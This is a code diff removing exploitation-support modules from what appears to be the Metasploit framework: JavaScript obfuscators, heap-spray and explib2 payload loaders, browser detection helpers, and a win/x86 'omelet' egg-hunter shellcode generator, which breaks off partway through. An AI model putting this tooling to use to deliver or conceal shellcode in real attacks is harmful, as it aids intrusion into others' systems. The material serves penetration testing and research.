js_obfu.obfuscate
|
||||
@js = js_obfu.to_s
|
||||
return @js
|
||||
elsif opts[:noobfu]
|
||||
# Do not obfuscate, let the exploit do the work (useful to avoid double obfuscation)
|
||||
return @js
|
||||
end
|
||||
|
||||
# Default to the old method
|
||||
# Obfuscate the javascript using the old method
|
||||
@js = ObfuscateJS.obfuscate(@js, 'Symbols' => SymbolNames)
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,6 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/exploitation/js/memory'
|
||||
require 'rex/exploitation/js/network'
|
||||
require 'rex/exploitation/js/utils'
|
||||
require 'rex/exploitation/js/detect'
|
|
@ -1,71 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
module Js
|
||||
|
||||
|
||||
class Detect
|
||||
|
||||
#
|
||||
# Provides several javascript functions for determining the OS and browser versions of a client.
|
||||
#
|
||||
# getVersion(): returns an object with the following properties
|
||||
# os_name - OS name such as "Windows 8", "Linux", "Mac OS X"
|
||||
# os_flavor - OS flavor as a string such as "Home", "Enterprise", etc
|
||||
# os_sp - OS service pack (e.g.: "SP2", will be empty on non-Windows)
|
||||
# os_lang - OS language (e.g.: "en-us")
|
||||
# os_vendor - A company or organization name such as Microsoft, Ubuntu, Apple, etc
|
||||
# os_device - A specific piece of hardware such as iPad, iPhone, etc
|
||||
# ua_name - Client name, one of the Msf::HttpClients constants
|
||||
# ua_version - Client version as a string (e.g.: "3.5.1", "6.0;SP2")
|
||||
# arch - Architecture, one of the ARCH_* constants
|
||||
#
|
||||
# The following functions work on the version returned in obj.ua_version
|
||||
#
|
||||
# ua_ver_cmp(a, b): returns -1, 0, or 1 based on whether a < b, a == b, or a > b respectively
|
||||
# ua_ver_lt(a, b): returns true if a < b
|
||||
# ua_ver_gt(a, b): returns true if a > b
|
||||
# ua_ver_eq(a, b): returns true if a == b
|
||||
#
|
||||
def self.os(custom_js = '')
|
||||
js = custom_js
|
||||
js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "os.js"))
|
||||
|
||||
Rex::Exploitation::JSObfu.new(js)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Provides javascript functions to determine IE addon information.
|
||||
#
|
||||
# getMsOfficeVersion(): Returns the version for Microsoft Office
|
||||
#
|
||||
def self.ie_addons(custom_js = '')
|
||||
js = custom_js
|
||||
js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "ie_addons.js"))
|
||||
|
||||
Rex::Exploitation::JSObfu.new(js)
|
||||
end
|
||||
|
||||
#
|
||||
# Provides javascript functions that work for all browsers to determine addon information
|
||||
#
|
||||
# getJavaVersion(): Returns the Java version
|
||||
# hasSilverlight(): Returns whether Silverlight is enabled or not
|
||||
#
|
||||
def self.misc_addons(custom_js = '')
|
||||
js = custom_js
|
||||
js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "misc_addons.js"))
|
||||
|
||||
Rex::Exploitation::JSObfu.new(js)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,81 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
module Js
|
||||
|
||||
#
|
||||
# Provides meomry manipulative functions in JavaScript
|
||||
#
|
||||
class Memory
|
||||
|
||||
def self.mstime_malloc
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "mstime_malloc.js"))
|
||||
js = js.gsub(/W00TA/, Rex::Text.rand_text_hex(6))
|
||||
js = js.gsub(/W00TB/, Rex::Text.rand_text_hex(5))
|
||||
|
||||
::Rex::Exploitation::ObfuscateJS.new(js,
|
||||
{
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ buf eleId acTag }
|
||||
}
|
||||
}).obfuscate
|
||||
end
|
||||
|
||||
def self.heaplib2(custom_js='', opts={})
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heaplib2.js"))
|
||||
|
||||
unless custom_js.to_s.strip.empty?
|
||||
js << custom_js
|
||||
end
|
||||
|
||||
js = ::Rex::Exploitation::JSObfu.new js
|
||||
js.obfuscate
|
||||
return js
|
||||
end
|
||||
|
||||
def self.property_spray
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "property_spray.js"))
|
||||
|
||||
::Rex::Exploitation::ObfuscateJS.new(js,
|
||||
{
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ sym_div_container data junk obj }
|
||||
}
|
||||
}).obfuscate
|
||||
end
|
||||
|
||||
def self.heap_spray
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heap_spray.js"))
|
||||
|
||||
::Rex::Exploitation::ObfuscateJS.new(js,
|
||||
{
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ index heapSprayAddr_hi heapSprayAddr_lo retSlide heapBlockCnt }
|
||||
}
|
||||
}).obfuscate
|
||||
end
|
||||
|
||||
def self.explib2
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "lib", "explib2.js"))
|
||||
|
||||
::Rex::Exploitation::ObfuscateJS.obfuscate(js)
|
||||
end
|
||||
|
||||
def self.explib2_payload(payload="exec")
|
||||
case payload
|
||||
when "drop_exec"
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "payload", "drop_exec.js"))
|
||||
else # "exec"
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "payload", "exec.js"))
|
||||
end
|
||||
|
||||
::Rex::Exploitation::ObfuscateJS.obfuscate(js)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,84 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
module Js
|
||||
|
||||
#
|
||||
# Provides networking functions in JavaScript
|
||||
#
|
||||
class Network
|
||||
|
||||
# @param [Hash] opts the options hash
|
||||
# @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
|
||||
# @option opts [Boolean] :inject_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
|
||||
# defaults to true.
|
||||
# @return [String] javascript code to perform a synchronous ajax request to the remote
|
||||
# and returns the response
|
||||
def self.ajax_download(opts={})
|
||||
should_obfuscate = opts.fetch(:obfuscate, true)
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_download.js"))
|
||||
|
||||
if should_obfuscate
|
||||
js = ::Rex::Exploitation::ObfuscateJS.new(js,
|
||||
{
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ xmlHttp oArg }
|
||||
}
|
||||
}).obfuscate
|
||||
end
|
||||
|
||||
xhr_shim(opts) + js
|
||||
end
|
||||
|
||||
# @param [Hash] opts the options hash
|
||||
# @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
|
||||
# @option opts [Boolean] :inject_xhr_shim automatically stubs XHR to use ActiveXObject when needed.
|
||||
# defaults to true.
|
||||
# @return [String] javascript code to perform a synchronous or asynchronous ajax request to
|
||||
# the remote with the data specified.
|
||||
def self.ajax_post(opts={})
|
||||
should_obfuscate = opts.fetch(:obfuscate, true)
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_post.js"))
|
||||
|
||||
if should_obfuscate
|
||||
js = ::Rex::Exploitation::ObfuscateJS.new(js,
|
||||
{
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ xmlHttp cb path data }
|
||||
}
|
||||
}).obfuscate
|
||||
end
|
||||
|
||||
xhr_shim(opts) + js
|
||||
end
|
||||
|
||||
# @param [Hash] opts the options hash
|
||||
# @option opts [Boolean] :obfuscate toggles js obfuscation. defaults to true.
|
||||
# @option opts [Boolean] :inject_xhr_shim false causes this method to return ''. defaults to true.
|
||||
# @return [String] javascript code that adds XMLHttpRequest to the global scope if it
|
||||
# does not exist (e.g. on IE6, where you have to use the ActiveXObject constructor)
|
||||
def self.xhr_shim(opts={})
|
||||
return '' unless opts.fetch(:inject_xhr_shim, true)
|
||||
|
||||
should_obfuscate = opts.fetch(:obfuscate, true)
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "xhr_shim.js"))
|
||||
|
||||
if should_obfuscate
|
||||
js = ::Rex::Exploitation::ObfuscateJS.new(js,
|
||||
{
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ activeObjs idx }
|
||||
}
|
||||
}
|
||||
).obfuscate
|
||||
end
|
||||
js
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,33 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
module Js
|
||||
|
||||
#
|
||||
# Javascript utilities
|
||||
#
|
||||
class Utils
|
||||
|
||||
def self.base64
|
||||
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "utils", "base64.js"))
|
||||
|
||||
opts = {
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
|
||||
input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
|
||||
'Methods' => %w{ _utf8_encode _utf8_decode encode decode }
|
||||
}
|
||||
}
|
||||
|
||||
::Rex::Exploitation::ObfuscateJS.new(js, opts).to_s
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,17 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Simple wrapper class that makes the JSObfu functionality
|
||||
# from the gem available under the Rex namespace.
|
||||
#
|
||||
class JSObfu < ::JSObfu
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,336 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/text'
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Obfuscates javascript in various ways
|
||||
#
|
||||
class ObfuscateJS
|
||||
attr_reader :opts
|
||||
|
||||
#
|
||||
# Obfuscates a javascript string.
|
||||
#
|
||||
# Options are 'Symbols', described below, and 'Strings', a boolean
|
||||
# which specifies whether strings within the javascript should be
|
||||
# mucked with (defaults to false).
|
||||
#
|
||||
# The 'Symbols' argument should have the following format:
|
||||
#
|
||||
# {
|
||||
# 'Variables' => [ 'var1', ... ],
|
||||
# 'Methods' => [ 'method1', ... ],
|
||||
# 'Namespaces' => [ 'n', ... ],
|
||||
# 'Classes' => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ]
|
||||
# }
|
||||
#
|
||||
# Make sure you order your methods, classes, and namespaces by most
|
||||
# specific to least specific to prevent partial substitution. For
|
||||
# instance, if you have two methods (joe and joeBob), you should place
|
||||
# joeBob before joe because it is more specific and will be globally
|
||||
# replaced before joe is replaced.
|
||||
#
|
||||
# A simple example follows:
|
||||
#
|
||||
# <code>
|
||||
# js = ObfuscateJS.new <<ENDJS
|
||||
# function say_hi() {
|
||||
# var foo = "Hello, world";
|
||||
# document.writeln(foo);
|
||||
# }
|
||||
# ENDJS
|
||||
# js.obfuscate(
|
||||
# 'Symbols' => {
|
||||
# 'Variables' => [ 'foo' ],
|
||||
# 'Methods' => [ 'say_hi' ]
|
||||
# }
|
||||
# 'Strings' => true
|
||||
# )
|
||||
# </code>
|
||||
#
|
||||
# which should generate something like the following:
|
||||
#
|
||||
# <code>
|
||||
# function oJaDYRzFOyJVQCOHk() { var cLprVG = "\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64"; document.writeln(cLprVG); }
|
||||
# </code>
|
||||
#
|
||||
# String obfuscation tries to deal with escaped quotes within strings but
|
||||
# won't catch things like
|
||||
# "\\"
|
||||
# so be careful.
|
||||
#
|
||||
def self.obfuscate(js, opts = {})
|
||||
ObfuscateJS.new(js).obfuscate(opts)
|
||||
end
|
||||
|
||||
#
|
||||
# Initialize an instance of the obfuscator
|
||||
#
|
||||
def initialize(js = "", opts = {})
|
||||
@js = js
|
||||
@dynsym = {}
|
||||
@opts = {
|
||||
'Symbols' => {
|
||||
'Variables'=>[],
|
||||
'Methods'=>[],
|
||||
'Namespaces'=>[],
|
||||
'Classes'=>[]
|
||||
},
|
||||
'Strings'=>false
|
||||
}
|
||||
@done = false
|
||||
update_opts(opts) if (opts.length > 0)
|
||||
end
|
||||
|
||||
def update_opts(opts)
|
||||
if (opts.nil? or opts.length < 1)
|
||||
return
|
||||
end
|
||||
if (@opts['Symbols'] && opts['Symbols'])
|
||||
['Variables', 'Methods', 'Namespaces', 'Classes'].each { |k|
|
||||
if (@opts['Symbols'][k] && opts['Symbols'][k])
|
||||
opts['Symbols'][k].each { |s|
|
||||
if (not @opts['Symbols'][k].include? s)
|
||||
@opts['Symbols'][k].push(s)
|
||||
end
|
||||
}
|
||||
elsif (opts['Symbols'][k])
|
||||
@opts['Symbols'][k] = opts['Symbols'][k]
|
||||
end
|
||||
}
|
||||
elsif opts['Symbols']
|
||||
@opts['Symbols'] = opts['Symbols']
|
||||
end
|
||||
@opts['Strings'] ||= opts['Strings']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the dynamic symbol associated with the supplied symbol name
|
||||
#
|
||||
# If obfuscation has not yet been performed (i.e. obfuscate() has not been
|
||||
# called), then this method simply returns its argument
|
||||
#
|
||||
def sym(name)
|
||||
@dynsym[name] || name
|
||||
end
|
||||
|
||||
#
|
||||
# Obfuscates the javascript string passed to the constructor
|
||||
#
|
||||
def obfuscate(opts = {})
|
||||
#return @js if (@done)
|
||||
@done = true
|
||||
|
||||
update_opts(opts)
|
||||
|
||||
if (@opts['Strings'])
|
||||
obfuscate_strings()
|
||||
|
||||
# Full space randomization does not work for javascript -- despite
|
||||
# claims that space is irrelavent, newlines break things. Instead,
|
||||
# use only space (0x20) and tab (0x09).
|
||||
|
||||
#@js.gsub!(/[\x09\x20]+/) { |s|
|
||||
# len = rand(50)+2
|
||||
# set = "\x09\x20"
|
||||
# buf = ''
|
||||
# while (buf.length < len)
|
||||
# buf << set[rand(set.length)].chr
|
||||
# end
|
||||
#
|
||||
# buf
|
||||
#}
|
||||
end
|
||||
|
||||
# Remove our comments
|
||||
remove_comments
|
||||
|
||||
# Globally replace symbols
|
||||
replace_symbols(@opts['Symbols']) if @opts['Symbols']
|
||||
|
||||
return @js
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the replaced javascript string
|
||||
#
|
||||
def to_s
|
||||
@js
|
||||
end
|
||||
alias :to_str :to_s
|
||||
|
||||
def <<(str)
|
||||
@js << str
|
||||
end
|
||||
def +(str)
|
||||
@js + str
|
||||
end
|
||||
|
||||
protected
|
||||
attr_accessor :done
|
||||
|
||||
#
|
||||
# Get rid of both single-line C++ style comments and multiline C style comments.
|
||||
#
|
||||
# Note: embedded comments (e.g.: "/*/**/*/") will break this,
|
||||
# but they also break real javascript engines so I don't care.
|
||||
#
|
||||
def remove_comments
|
||||
@js.gsub!(%r{\s+//.*$}, '')
|
||||
@js.gsub!(%r{/\*.*?\*/}m, '')
|
||||
end
|
||||
|
||||
# Replace method, class, and namespace symbols found in the javascript
|
||||
# string
|
||||
def replace_symbols(symbols)
|
||||
taken = { }
|
||||
|
||||
# Generate random symbol names
|
||||
[ 'Variables', 'Methods', 'Classes', 'Namespaces' ].each { |symtype|
|
||||
next if symbols[symtype].nil?
|
||||
symbols[symtype].each { |sym|
|
||||
dyn = Rex::Text.rand_text_alpha(rand(32)+1) until dyn and not taken.key?(dyn)
|
||||
|
||||
taken[dyn] = true
|
||||
|
||||
if symtype == 'Classes'
|
||||
full_sym = sym['Namespace'] + "." + sym['Class']
|
||||
@dynsym[full_sym] = dyn
|
||||
|
||||
@js.gsub!(/#{full_sym}/) { |m|
|
||||
sym['Namespace'] + "." + dyn
|
||||
}
|
||||
else
|
||||
@dynsym[sym] = dyn
|
||||
|
||||
@js.gsub!(/#{sym}/, dyn)
|
||||
end
|
||||
}
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Change each string into some javascript that will generate that string
|
||||
#
|
||||
# There are a couple of caveats to using string obfuscation:
|
||||
# * it tries to deal with escaped quotes within strings but won't catch
|
||||
# things like: "\\"
|
||||
# * depending on the random choices, this can easily balloon a short
|
||||
# string up to hundreds of kilobytes if called multiple times.
|
||||
# so be careful.
|
||||
#
|
||||
def obfuscate_strings()
|
||||
@js.gsub!(/".*?[^\\]"|'.*?[^\\]'/) { |str|
|
||||
buf = ''
|
||||
quote = str[0,1]
|
||||
# Pull the quotes off either end
|
||||
str = str[1, str.length-2]
|
||||
case (rand(2))
|
||||
# Disable hex encoding for now. It's just too big a hassle.
|
||||
#when 0
|
||||
# # This is where we can run into trouble with generating
|
||||
# # incorrect code. If we hex encode a string twice, the second
|
||||
# # encoding will generate the first instead of the original
|
||||
# # string.
|
||||
# if str =~ /\\x/
|
||||
# # Always have to remove spaces from strings so the space
|
||||
# # randomization doesn't mess with them.
|
||||
# buf = quote + str.gsub(/ /, '\x20') + quote
|
||||
# else
|
||||
# buf = '"' + Rex::Text.to_hex(str) + '"'
|
||||
# end
|
||||
when 0
|
||||
#
|
||||
# Escape sequences when naively encoded for unescape become a
|
||||
# literal backslash instead of the intended meaning. To avoid
|
||||
# that problem, we scan the string for escapes and leave them
|
||||
# unmolested.
|
||||
#
|
||||
buf << 'unescape("'
|
||||
bytes = str.unpack("C*")
|
||||
c = 0
|
||||
while bytes[c]
|
||||
if bytes[c].chr == "\\"
|
||||
# XXX This is pretty slow.
|
||||
esc_len = parse_escape(bytes, c)
|
||||
buf << bytes[c, esc_len].map{|a| a.chr}.join
|
||||
c += esc_len
|
||||
next
|
||||
end
|
||||
buf << "%%%0.2x"%(bytes[c])
|
||||
# Break the string into smaller strings
|
||||
if bytes[c+1] and rand(10) == 0
|
||||
buf << '" + "'
|
||||
end
|
||||
c += 1
|
||||
end
|
||||
buf << '")'
|
||||
when 1
|
||||
buf = "String.fromCharCode( "
|
||||
bytes = str.unpack("C*")
|
||||
c = 0
|
||||
while bytes[c]
|
||||
if bytes[c].chr == "\\"
|
||||
case bytes[c+1].chr
|
||||
# For chars that contain their non-escaped selves, step
|
||||
# past the backslash and let the rand() below decide
|
||||
# how to represent the character.
|
||||
when '"'; c += 1
|
||||
when "'"; c += 1
|
||||
when "\\"; c += 1
|
||||
# For others, just take the hex representation out of
|
||||
# laziness.
|
||||
when "n"; buf << "0x0a"; c += 2; next
|
||||
when "t"; buf << "0x09"; c += 2; next
|
||||
# Lastly, if it's a hex, unicode, or octal escape,
|
||||
# leave it, and anything after it, alone. At some
|
||||
# point we may want to parse up to the end of the
|
||||
# escapes and encode subsequent non-escape characters.
|
||||
# Since this is the lazy way to do it, spaces after an
|
||||
# escape sequence will get away unmodified. To prevent
|
||||
# the space randomizer from hosing the string, convert
|
||||
# spaces specifically.
|
||||
else
|
||||
buf = buf[0,buf.length-1] + " )"
|
||||
buf << ' + ("' + bytes[c, bytes.length].map{|a| a==0x20 ? '\x20' : a.chr}.join + '" '
|
||||
break
|
||||
end
|
||||
end
|
||||
case (rand(3))
|
||||
when 0
|
||||
buf << " %i,"%(bytes[c])
|
||||
when 1
|
||||
buf << " 0%o,"%(bytes[c])
|
||||
when 2
|
||||
buf << " 0x%0.2x,"%(bytes[c])
|
||||
end
|
||||
c += 1
|
||||
end
|
||||
# Strip off the last comma
|
||||
buf = buf[0,buf.length-1] + " )"
|
||||
end
|
||||
buf
|
||||
}
|
||||
@js
|
||||
end
|
||||
|
||||
def parse_escape(bytes, offset)
|
||||
esc_len = 0
|
||||
if bytes[offset].chr == "\\"
|
||||
case bytes[offset+1].chr
|
||||
when "u"; esc_len = 6 # unicode \u1234
|
||||
when "x"; esc_len = 4 # hex, \x41
|
||||
when /[0-9]/ # octal, \123, \0
|
||||
oct = bytes[offset+1, 4].map{|a|a.chr}.join
|
||||
oct =~ /([0-9]+)/
|
||||
esc_len = 1 + $1.length
|
||||
else; esc_len = 2 # \" \n, etc.
|
||||
end
|
||||
end
|
||||
esc_len
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,321 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'metasm'
|
||||
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides an interface to generating an eggs-to-omelet hunter for win/x86.
|
||||
#
|
||||
# Written by corelanc0d3r <peter.ve@corelan.be>
|
||||
#
|
||||
###
|
||||
class Omelet
|
||||
|
||||
###
|
||||
#
|
||||
# Windows-based eggs-to-omelet hunters
|
||||
#
|
||||
###
|
||||
module Windows
|
||||
Alias = "win"
|
||||
|
||||
module X86
|
||||
Alias = ARCH_X86
|
||||
|
||||
#
|
||||
# The hunter stub for win/x86.
|
||||
#
|
||||
def hunter_stub
|
||||
{
|
||||
# option hash members go here (currently unused)
|
||||
}
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# Generic interface
|
||||
#
|
||||
###
|
||||
|
||||
#
|
||||
# Creates a new hunter instance and acquires the sub-class that should
|
||||
# be used for generating the stub based on the supplied platform and
|
||||
# architecture.
|
||||
#
|
||||
def initialize(platform, arch = nil)
|
||||
Omelet.constants.each { |c|
|
||||
mod = self.class.const_get(c)
|
||||
|
||||
next if ((!mod.kind_of?(::Module)) or (!mod.const_defined?('Alias')))
|
||||
|
||||
if (platform =~ /#{mod.const_get('Alias')}/i)
|
||||
self.extend(mod)
|
||||
|
||||
if (arch and mod)
|
||||
mod.constants.each { |a|
|
||||
amod = mod.const_get(a)
|
||||
|
||||
next if ((!amod.kind_of?(::Module)) or
|
||||
(!amod.const_defined?('Alias')))
|
||||
|
||||
if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
|
||||
amod = mod.const_get(a)
|
||||
|
||||
self.extend(amod)
|
||||
end
|
||||
}
|
||||
end
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# This method generates an eggs-to-omelet hunter using the derived hunter stub.
|
||||
#
|
||||
def generate(payload, badchars = '', opts = {})
|
||||
|
||||
eggsize = opts[:eggsize] || 123
|
||||
eggtag = opts[:eggtag] || "00w"
|
||||
searchforward = opts[:searchforward] || true
|
||||
reset = opts[:reset]
|
||||
startreg = opts[:startreg]
|
||||
usechecksum = opts[:checksum]
|
||||
adjust = opts[:adjust] || 0
|
||||
|
||||
return nil if ((opts = hunter_stub) == nil)
|
||||
|
||||
# calculate number of eggs
|
||||
payloadlen = payload.length
|
||||
delta = payloadlen / eggsize
|
||||
delta = delta * eggsize
|
||||
nr_eggs = payloadlen / eggsize
|
||||
if delta < payloadlen
|
||||
nr_eggs = nr_eggs+1
|
||||
end
|
||||
|
||||
nr_eggs_hex = "%02x" % nr_eggs
|
||||
eggsize_hex = "%02x" % eggsize
|
||||
|
||||
hextag = ''
|
||||
eggtag.each_byte do |thischar|
|
||||
decchar = "%02x" % thischar
|
||||
hextag = decchar + hextag
|
||||
end
|
||||
hextag = hextag + "01"
|
||||
|
||||
# search forward or backward ?
|
||||
setflag = nil
|
||||
searchstub1 = nil
|
||||
searchstub2 = nil
|
||||
flipflagpre = ''
|
||||
flipflagpost = ''
|
||||
checksum = ''
|
||||
|
||||
if searchforward
|
||||
# clear direction flag
|
||||
setflag = "cld"
|
||||
searchstub1 = "dec edx\n\tdec edx\n\tdec edx\n\tdec edx"
|
||||
searchstub2 = "inc edx"
|
||||
else
|
||||
# set the direction flag
|
||||
setflag = "std"
|
||||
searchstub1 = "inc edx\n\tinc edx\n\tinc edx\n\tinc edx"
|
||||
searchstub2 = "dec edx"
|
||||
flipflagpre = "cld\n\tsub esi,-8"
|
||||
flipflagpost = "std"
|
||||
end
|
||||
|
||||
# will we have to adjust the destination address ?
|
||||
adjustdest = ''
|
||||
if adjust > 0
|
||||
adjustdest = "\n\tsub edi,#{adjust}"
|
||||
elsif adjust < 0
|
||||
adjustdest = "\n\tadd edi,#{adjust}"
|
||||
end
|
||||
|
||||
# prepare the stub that starts the search
|
||||
startstub = ''
|
||||
if startreg
|
||||
if startreg.downcase != 'ebp'
|
||||
startstub << "mov ebp,#{startreg}"
|
||||
end
|
||||
startstub << "\n\t" if startstub.length > 0
|
||||
startstub << "mov edx,ebp"
|
||||
end
|
||||
# a register will be used as start location for the search
|
||||
startstub << "\n\t" if startstub.length > 0
|
||||
startstub << "push esp\n\tpop edi\n\tor di,0xffff"
|
||||
startstub << adjustdest
|
||||
# edx will be used, start at end of stack frame
|
||||
if not startreg
|
||||
startstub << "\n\tmov edx,edi"
|
||||
if reset
|
||||
startstub << "\n\tpush edx\n\tpop ebp"
|
||||
end
|
||||
end
|
||||
|
||||
# reset start after each egg was found ?
|
||||
# will allow to find eggs when they are out of order/sequence
|
||||
resetstart = ''
|
||||
if reset
|
||||
resetstart = "push ebp\n\tpop edx"
|
||||
end
|
||||
|
||||
#checksum code by dijital1 & corelanc0d3r
|
||||
if usechecksum
|
||||
checksum = <<EOS
|
||||
xor ecx,ecx
|
||||
xor eax,eax
|
||||
calc_chksum_loop:
|
||||
add al,byte [edx+ecx]
|
||||
inc ecx
|
||||
cmp cl, egg_size
|
||||
jnz calc_chksum_loop
|
||||
test_chksum:
|
||||
cmp al,byte [edx+ecx]
|
||||
jnz find_egg
|
||||
EOS
|
||||
end
|
||||
|
||||
# create omelet code
|
||||
omelet_hunter = <<EOS
|
||||
|
||||
nr_eggs equ 0x#{nr_eggs_hex} ; number of eggs
|
||||
egg_size equ 0x#{eggsize_hex} ; nr bytes of payload per egg
|
||||
hex_tag equ 0x#{hextag} ; tag
|
||||
|
||||
#{setflag} ; set/clear direction flag
|
||||
jmp start
|
||||
|
||||
; routine to calculate the target location
|
||||
; for writing recombined shellcode (omelet)
|
||||
; I'll use EDI as target location
|
||||
; First, I'll make EDI point to end of stack
|
||||
; and I'll put the number of shellcode eggs in eax
|
||||
get_target_loc:
|
||||
#{startstub} ; use edx as start location for the search
|
||||
xor eax,eax ; zero eax
|
||||
mov al,nr_eggs ; put number of eggs in eax
|
||||
|
||||
calc_target_loc:
|
||||
xor esi,esi ; use esi as counter to step back
|
||||
mov si,0-(egg_size+20) ; add 20 bytes of extra space, per egg
|
||||
|
||||
get_target_loc_loop: ; start loop
|
||||
dec edi ; step back
|
||||
inc esi ; and update ESI counter
|
||||
cmp si,-1 ; continue to step back until ESI = -1
|
||||
jnz get_target_loc_loop
|
||||
dec eax ; loop again if we did not take all pieces
|
||||
; into account yet
|
||||
jnz calc_target_loc
|
||||
|
||||
; edi now contains target location
|
||||
; for recombined shellcode
|
||||
xor ebx,ebx ; put loop counter in ebx
|
||||
mov bl,nr_eggs+1
|
||||
ret
|
||||
|
||||
start:
|
||||
call get_target_loc ; jump to routine which will calculate shellcode dst address
|
||||
|
||||
; start looking for eggs, using edx as basepointer
|
||||
jmp search_next_address
|
||||
|
||||
find_egg:
|
||||
#{searchstub1} ; based on search direction
|
||||
|
||||
search_next_address:
|
||||
#{searchstub2} ; based on search direction
|
||||
push edx ; save edx
|
||||
push 0x02 ; use NtAccessCheckAndAuditAlarm syscall
|
||||
pop eax ; set eax to 0x02
|
||||
int 0x2e
|
||||
cmp al,0x5 ; address readable ?
|
||||
pop edx ; restore edx
|
||||
je search_next_address ; if addressss is not readable, go to next address
|
||||
|
||||
mov eax,hex_tag ; if address is readable, prepare tag in eax
|
||||
add eax,ebx ; add offset (ebx contains egg counter, remember ?)
|
||||
xchg edi,edx ; switch edx/edi
|
||||
scasd ; edi points to the tag ?
|
||||
xchg edi,edx ; switch edx/edi back
|
||||
jnz find_egg ; if tag was not found, go to next address
|
||||
;found the tag at edx
|
||||
|
||||
;do we need to verify checksum ? (prevents finding corrupted eggs)
|
||||
#{checksum}
|
||||
|
||||
copy_egg:
|
||||
; ecx must first be set to egg_size (used by rep instruction) and esi as source
|
||||
mov esi,edx ; set ESI = EDX (needed for rep instruction)
|
||||
xor ecx,ecx
|
||||
mov cl,egg_size ; set copy counter
|
||||
#{flipflagpre} ; flip destination flag if necessary
|
||||
rep movsb ; copy egg from ESI to EDI
|
||||
#{flipflagpost} ; flip destination flag again if necessary
|
||||
dec ebx ; decrement egg
|
||||
#{resetstart} ; reset start location if necessary
|
||||
cmp bl,1 ; found all eggs ?
|
||||
jnz find_egg ; no = look for next egg
|
||||
; done - all eggs have been found and copied
|
||||
|
||||
done:
|
||||
call get_target_loc ; re-calculate location where recombined shellcode is placed
|
||||
cld
|
||||
jmp edi ; and jump to it :)
|
||||
EOS
|
||||
|
||||
the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
|
||||
|
||||
# create the eggs array
|
||||
total_size = eggsize * nr_eggs
|
||||
padlen = total_size - payloadlen
|
||||
payloadpadding = "A" * padlen
|
||||
|
||||
fullcode = payload + payloadpadding
|
||||
eggcnt = nr_eggs + 2
|
||||
startcode = 0
|
||||
|
||||
eggs = []
|
||||
while eggcnt > 2 do
|
||||
egg_prep = eggcnt.chr + eggtag
|
||||
this_egg = fullcode[startcode, eggsize]
|
||||
if usechecksum
|
||||
cksum = 0
|
||||
this_egg.each_byte { |b|
|
||||
cksum += b
|
||||
}
|
